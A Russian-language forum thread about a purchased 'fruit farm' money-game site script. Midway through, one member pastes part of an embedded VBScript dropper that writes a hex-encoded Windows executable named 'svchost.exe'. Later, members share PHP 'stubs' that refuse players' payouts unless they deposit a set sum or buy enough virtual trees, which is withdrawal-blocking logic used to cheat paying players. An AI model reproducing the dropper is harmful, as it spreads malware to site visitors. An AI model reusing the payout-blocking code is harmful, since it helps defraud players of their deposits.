Продам Продам скрипт фф

[Alisheriminov Участник]

Ребят кто тестил скрипт, подскажите пожалуйста при выводе на Payeer выдает вот такое и ничего дальше не происходит

 

[ksander Участник]

Здравствуйте друзья товарищи!
Как то утром решил проверить утилитой от доктора веба. И он не таку бяку нашел в данном скрипте, Вот скриншот

Думаю что многие поймут что данный скрипт стоит на денвере. Ладно решил по по путям пройтись. И что дальше увидел такого ода кодированный код. Весь не стал кидать, проще прикреплю файл

<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000005258727E16391C2D16391C2D16391C2DD536412D1B391C2D16391D2D54391C2D31FF6E2D17391C2D31FF602D17391C2D31FF642D17391C2D5269636816391C2D000000000000000000000000000000000000000000000000504500004C010500119D4A4D0000000000000000E0000F010B01080000080000009A0100000000000011000000100000002000000000400000100000000200000400000000000000040000000000000000A002000004000000000000020000040000100000100000000010000010000000000000100000000000000000000000602100008C00000000900100003400000000000000000000000000000000000000D00100C000000000000000000000000000000000000000000000000000000000000000000000000020000020000000000000000000000000200000200100000000000000000000000000000000000000000000000000002E74657874000000D6060000001000000008000000040000000000000000000000000000200000602E72646174610000980700000020000000080000000C0000000000000000000000000000400000402E64617461000000385A010000300000005C010000140000000000000000000000000000400000C02E7273726300000000340000009001000034000000700100000000000000000000000000400000402E72656C6F63000000D0000000D001000002000000A401000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000085C0568BF274118A1683E801881183C10183C60185C075EF5EC3CCCCCCCCCCCC558BEC83EC508B450C8B08538B58045657894DFCC745F8994ED85803D083EA6A8B45F8B8BE6B00008B80EAB43F0068585D0000FFD0B92

Так что я думаю тут Продавец нечист! http://clip2net.com/s/3nHjr4H файлик вот. И на данный момент не надо говорить что так и должно. Продавцу потерял доверие.

 

[Яна Участник]

Ну на счёт этого что вирус в скрипте я подозревала но я заметила это давно что именно этот раздел в скрипте с хостинга не удаляется тоесть удаляешь папку через некоторое время она опять появляется

 

[Яна Участник]

ед что сделала что либо там не было каканибудь бяка поставила права 444

 

[ksander Участник]

Ну на счёт этого что вирус в скрипте я подозревала но я заметила это давно что именно этот раздел в скрипте с хостинга не удаляется тоесть удаляешь папку через некоторое время она опять появляется

Вот теперь я думаю стоит ли этот скрипт вообще запускать. А не нашла что именно загружает?

 

[Яна Участник]

Вот теперь я думаю стоит ли этот скрипт вообще запускать. А не нашла что именно загружает?

пока нет но ед вариант это закрыть правами 444 и дальше этой папки какой бы скрипт не был он не выпонит свою работу и в эту папку уже не чего загрузить нельзя будет .месяц стоит скрипт не трогали

 

[ksander Участник]

Еще в этом скрипте какаято интересная заглушка на вывод.

 

[Яна Участник]

Еще в этом скрипте какаято интересная заглушка на вывод.

Я сменла заглушки все )))

 

[ksander Участник]

Я сменла заглушки все )))

Не поделишься ?

 

[Яна Участник]

Обычные заглушки которые ставят на фруктовую ферму
Выплату в автоматическом режиме могут заказывать пользователи, которые пополнили баланс на 600 руб или имеющие хотя бы активных рефералов! которые принесли вам доход на 100 руб Такая у меня только в автоматическом выводе а на ручном надо пополнить 150 рублей

 

[ksander Участник]

Странно но уменя только так

#Заглушка от халявщиков
$db->Query("SELECT (a_t + b_t + c_t + d_t + e_t) all_trees FROM db_users_b WHERE id = {$_SESSION["user_id"]}");
$data = $db->FetchArray();
if($data['all_trees'] <= 1000){?>
    <div style="color: red;text-align: center;font-size: 12pt;margin-top: 10px;display: block;font-weight: bold;">Заказывать выплату могут те пользователи, которые пополнили баланс на 300 руб одним платежом. </div>
<?}else{?>

Да и доктор веб, очистил проблемные файлы .

 

[Яна Участник]

Странно но уменя только так

#Заглушка от халявщиков
$db->Query("SELECT (a_t + b_t + c_t + d_t + e_t) all_trees FROM db_users_b WHERE id = {$_SESSION["user_id"]}");
$data = $db->FetchArray();
if($data['all_trees'] <= 1000){?>
    <div style="color: red;text-align: center;font-size: 12pt;margin-top: 10px;display: block;font-weight: bold;">Заказывать выплату могут те пользователи, которые пополнили баланс на 300 руб одним платежом. </div>
<?}else{?>

Да и доктор веб, очистил проблемные файлы .

Это родная заглушка скрипта я стёрла ёё и добавила обычную а то что ты скинул заглушку там нужно купить хотябы одно животное как минимум 1000 штук или все 5 животных по 1000 штук я уже не помню точна как она работает

 

[kvozimir Участник]

насчет вируса было дело когда приобрел скрипт,у меня сразу антивирус ругаться стал когда скрипт начал закачиваться

 

[ksander Участник]

Фрикассу кто нибудь сделал?

 

[APTEMOH Участник]

Фрикассу кто нибудь сделал?

Да, а что ее там делать?

 

[Dr_Brown Участник]

ещё можно купить копию?

 

[kvozimir Участник]

ещё можно купить копию?

все проданы,но если договоришься ......